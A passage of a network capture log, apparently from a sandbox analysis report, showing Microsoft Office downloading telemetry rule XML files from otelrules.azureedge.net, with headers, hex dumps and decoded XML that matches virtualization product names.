                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            73192.168.2.44986613.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:26 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:26 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 485
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB9769355"
                                                                                                                                                                                            x-ms-request-id: f37cb76d-d01e-0017-2085-3ab035000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200526Z-1777c6cb754j8gqphC1TEB5bf800000009yg00000000gse2
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:27 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            74192.168.2.44986913.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:26 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:26 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB556A907"
                                                                                                                                                                                            x-ms-request-id: 2deeee2f-b01e-001e-4967-3b0214000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200526Z-185f5d8b95csd4bwhC1NYCq7dc0000000am000000000v7qp
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:27 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            75192.168.2.44987013.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:28 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:28 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 502
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                            x-ms-request-id: 5c70d6ce-001e-00ad-368c-3a554b000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200528Z-185f5d8b95csd4bwhC1NYCq7dc0000000aqg000000006xt0
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:29 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            76192.168.2.44987113.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:29 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:29 UTC498INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:29 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                            ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                            x-ms-request-id: 4ad18980-501e-008c-067e-3bcd39000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200529Z-r1d97b99577n5jhbhC1TEB74vn000000098g00000000f3gt
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache-Info: L2_T2
                                                                                                                                                                                            X-Cache: TCP_REMOTE_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:29 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            77192.168.2.44987313.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:29 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:29 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 408
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                            x-ms-request-id: d35eaebc-501e-0064-178c-3a1f54000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200529Z-185f5d8b95crwqd8hC1NYCps680000000aqg00000000m56v
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:29 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            78192.168.2.44987213.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:29 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:29 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                            x-ms-request-id: 3369a0ea-601e-0002-63f2-3aa786000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200529Z-r1d97b99577xdmfxhC1TEBqbhg00000000yg00000000e9x4
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:29 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            79192.168.2.44987413.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:29 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:29 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 469
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                            x-ms-request-id: 495def62-b01e-0098-458c-3acead000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200529Z-1777c6cb754vxwc9hC1TEBykgw00000009zg00000000rxu9
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:29 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            80192.168.2.44987513.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:30 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:31 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 416
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                            x-ms-request-id: 9cc78053-901e-008f-7b8c-3a67a6000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200531Z-185f5d8b95csd4bwhC1NYCq7dc0000000ahg000000013g1f
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:31 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            81192.168.2.44987613.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:31 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:31 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                            ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                            x-ms-request-id: 171aa64f-101e-005a-5b63-3b882b000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200531Z-178bfbc474bq2pr7hC1NYCkfgg00000000qg0000000007r9
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:31 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            82192.168.2.44987813.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:31 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:31 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 475
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                            ETag: "0x8DC582BBA740822"
                                                                                                                                                                                            x-ms-request-id: 9cb1ed33-701e-0021-398c-3a3d45000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200531Z-185f5d8b95cwtv72hC1NYC141w0000000ar0000000001mev
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
